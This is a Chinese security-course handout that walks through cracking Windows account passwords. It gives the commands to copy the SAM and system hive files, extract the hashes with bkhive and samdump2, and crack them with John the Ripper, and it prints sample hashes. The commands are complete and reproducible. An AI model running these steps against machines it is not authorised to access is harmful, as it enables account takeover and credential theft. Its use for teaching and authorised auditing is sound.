计算机安全技术TOOLS教程课件3.3.1 实例：破解Windows用户密码.docVIP

3.3.1 实例：破解Windows用户密码 删除Windows登录密码的一种简单的方法是使用Windows安装盘（启动界面中应该包含删除Windows登录密码之类的选项），启动界面如图3-93所示，执行[6]即可。 下面介绍破解Windows登录密码方法。 操作系统为：RHEL/CentOS/Fedora。 到网站下载john-1.7.2.tar.gz、bkhive-1.1.1.tar.gz和samdump2-1.1.1.tar.gz。将这3个文件放在Linux桌面上。将Windows系统C:\windows\system32\config\中的两个文件：SAM和system复制到Linux桌面上。 图3-93 Win2003安装盘启动界面 然后在终端窗口执行如下命令： 1．解压缩bkhive-1.1.1.tar.gz [root@localhost Desktop]# tar xzvf bkhive-1.1.1.tar.gz [root@localhost Desktop]# cd bkhive-1.1.1 2．编译bkhive [root@localhost bkhive-1.1.1]# make 用bkhive命令从system文件生成一个system.txt文件： [root@localhost bkhive-1.1.1]# ./bkhive ../system ../system.txt 3．解压缩samdump2-1.1.1.tar.gz [root@localhost Desktop]# tar xzvf samdump2-1.1.1.tar.gz [root@localhost Desktop]# cd samdump2-1.1.1 4．编译samdump2 [root@localhost samdump2-1.1.1]# make 5．提取账号信息 用samdump2命令从system.txt文件和sam文件生成一个passwd_hashes.txt文件，passwd_hashes.txt文件的内容是最终要被破解的用户账号信息。 [root@localhost samdump2-1.1.1]# ./samdump2 ../sam ../system.txt ../passwd_hashes.txt passwd_hashes.txt文件的内容如下： Administor:500:5422a4cdb0f1c794aad3b435b51404ee:bb8dee57b13255f1a98447::: ztg:1009:e3f4e1bd22b5037eaad3b435b51404ee:7d4cddee4d03cf40bcf86fd8ac0218fd::: 6．使用john破解Windows用户密码 [root@localhost samdump2-1.1.1]# cd .. [root@localhost Desktop]# tar xzvf john-1.7.5.tar.gz [root@localhost Desktop]# cd john-1.7.5/src [root@localhost src]# make clean generic [root@localhost src]# cd ../run [root@localhost run]# ./john --incremental:Alpha ../../passwd_hashes.txt 在图3-94中，使用第①行的命令对passwd_hashes.txt文件进行解密，两秒钟就将administrator和ztguang用户的密码破解出来了。 图3-94 使用john破解Windows用户密码 图3-95 被破解的密码 第②行再次执行前面的命令对passwd_hashes.txt文件进行解密，给出了“No password hashes loaded”的提示，原因在于已经被破解的密码会被保存在john.pot文件中，这样避免了重复性的工作，john.pot文件的内容如图3-95所示。执行第③行的命令将john.pot文件删除，再次执行第④行的命令，结果如图3-94所示。